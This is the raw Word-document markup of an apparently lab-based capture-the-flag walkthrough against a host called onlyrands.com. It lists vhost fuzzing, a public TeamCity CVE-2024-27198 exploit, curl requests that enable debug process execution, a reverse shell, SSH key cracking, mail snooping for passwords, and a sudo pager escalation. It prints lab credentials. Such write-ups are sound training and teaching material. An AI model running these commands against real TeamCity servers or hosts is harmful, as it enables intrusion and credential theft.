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ADA076E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EC7C93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scruting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D48F1E0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EC7C93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2F01D1FF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Add “</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onlyrands.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” to /etc/hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1ED4A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Just in case, I fuzzed for vhosts. This is my go-to vhost fuzzing command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D591EED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ffuf -H "Host: FUZZ.onlyrands.com" -H "User-Agent: PENTEST" -c -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt"-u http://onlyrands.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6322C932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Make sure to add a filter. I like to filter on size by tacking on -</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fs &lt;size to filter&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D5C1B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ffuf shows me a teams vhost. Make sure to add the new vhost to /etc/hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72134296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Upon visiting, we have a TeamCity page.</w:t>
      </w:r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8C654E1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I found that this guy worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB3003A" w14:textId="77777777" w:rsidR="00235E00" w:rsidRPr="00235E00" w:rsidRDefault="00235E00" w:rsidP="00235E00">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://github.com/Stuub/RCity-CVE-2024-27198?source=post_page-----01737dd96583---------------------------------------" \t "_blank"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C654B" w14:textId="77777777" w:rsidR="00235E00" w:rsidRPr="00235E00" w:rsidRDefault="00235E00" w:rsidP="00235E00">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GitHub - Stuub/RCity-CVE-2024-27198: CVE-2024-27198 &amp; CVE-2024-27199 PoC - RCE, Admin Account…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566DF3C" w14:textId="77777777" w:rsidR="00235E00" w:rsidRPr="00235E00" w:rsidRDefault="00235E00" w:rsidP="00235E00">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2024-27198 &amp; CVE-2024-27199 PoC - RCE, Admin Account Creation, Enum Users, Server Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068EFDB5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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD04EC3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python3 RCity.py -t http://teams.onlyrands.com/ - no-enum -c id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A57E5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lastRenderedPageBreak/>
        <w:t>I had to tack on a -c argument for the shell not to exit automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAC9DA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Oh no! But when I enter a command, I get something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE8BFB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 xml:space="preserve">Responding with error, status code: 400 (Bad Request). </w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Details: jetbrains.buildServer.server.rest.errors.BadRequestException: This server is not configured to allow process debug launch via “rest.debug.processes.enable” internal property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659D2360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Turns out we need to</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> enable debug mode. </w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We will do this using a POST request with curl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58630CE4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In order to do this, we first need to get an an admin token using our admin creds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF259B2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Look back through the exploit you just ran, and get those admin creds (example below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="6E67FDD1" w:rsidR="00843DCE" w:rsidRDefault="00235E00" w:rsidP="00235E00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F00B101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curl -X POST http://teams.onlyrands.com/app/rest/users/id:39/tokens/RPC2 -u RCity_Rules_847:IlNwA4O4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589380FA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Take that token from the “value” field, then export to the TOKEN environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7DC59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export TOKEN="&lt;TOKEN HERE&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D20E4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curl -X POST 'http://teams.onlyrands.com/admin/dataDir.html?action=edit&amp;fileName=config%2Finternal.properties&amp;content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3AD81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Then refresh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584BFD93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curl 'http://teams.onlyrands.com/admin/admin.html?item=diagnostics&amp;tab=dataDir&amp;file=config/internal.properties' -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764BCC90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Then run</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> python3 RCity.py -t </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00235E00">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://teams.onlyrands.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> -c id</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> again, now that debug mode is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED36133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I ran a perl reverse shell from pentestmonkey’s list and caught it on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A148D" w14:textId="1E44C81B" w:rsidR="00843DCE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Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74634EAE" w14:textId="77777777" w:rsidR="00235E00" w:rsidRDefault="00235E00" w:rsidP="00235E00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1F02989C" w:rsidR="00843DCE" w:rsidRDefault="00235E00" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>When I did this box, I noticed through the TeamCity admin portal that marcot accidentally gave us an id_rsa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA0B3F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You can also find it through running </w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>git log </w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on /srv/git/freelancers/marcot.git. But it’s obviously easier to download through the site, so just use creds you made through the exploit and do that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E6B38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When trying to run it locally, you see that you need a password for the id_rsa key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536CD6E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You can find this by using ssh2john to generate a hash, then cracking said hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273C07D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ssh2john.py id_rsa &gt; hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>john hashfile --wordlist=rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC58D8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You’ll very quickly find out that the password is “</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cheer</w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D943B8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And it took me way too long to find out that the password for marcot is “cheer” as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="35079707" w:rsidR="00843DCE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Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CF698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Sick, now we’re “marcot”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D1C48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Now we can read some of these files in /var/www/mail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A2C1B0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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Just a tip: If you see port 25 or SMTP on the target, always look through /var/mail/ and /var/spool/mail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED3403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“cat /var/mail/*” will do the trick. Can grep for password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0549D907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It’s important to read the email. </w:t>
      </w:r>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Matthew’s not just giving away his password, he’s saying that he left Marco something on his (Matthew’s) account. Also, who’s Dach? With some basic enumeration (/etc/passwd, namely), you can see that Dach corresponds to briand’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1789DA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So we can use that password to log in as Matthew.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1065C3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matthewa:IdealismEngineAshen476</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC751B8" w14:textId="441DE70B" w:rsid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This guy’s easily missable. Never forget dir -a. Even then, I almost missed it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A35684A" w14:textId="77777777" w:rsidR="00235E00" w:rsidRDefault="00235E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29FD954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lastRenderedPageBreak/>
        <w:t>There you go, we now have briand’s (Dach’s) password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396127AF" w14:textId="77777777" w:rsidR="00235E00" w:rsidRP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Another “su” command, and we’re in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B51CC7" w14:textId="5F3C38F1" w:rsid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Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ABB2B8" w14:textId="2352DFA7" w:rsid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And now, it’s our favorite low-hanging fruit. Ever heard of GTFObins?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF2B7C" w14:textId="0A4C188A" w:rsidR="00235E00" w:rsidRDefault="00235E00" w:rsidP="00235E00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235E00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Just use “sudo” to run what “sudo -l” gives us, then once in the pager, run “!sh”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102024AE" w14:textId="77777777" w:rsidR="00235E00" w:rsidRDefault="00235E00" w:rsidP="00235E00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274166B9" w:rsidR="00A311DF" w:rsidRPr="00235E00" w:rsidRDefault="00235E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sectPr w:rsidR="00A311DF" w:rsidRPr="00235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35E00"/>
    <w:rsid w:val="002551EA"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00EC7C93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ams.onlyran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2026-01-05T12:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>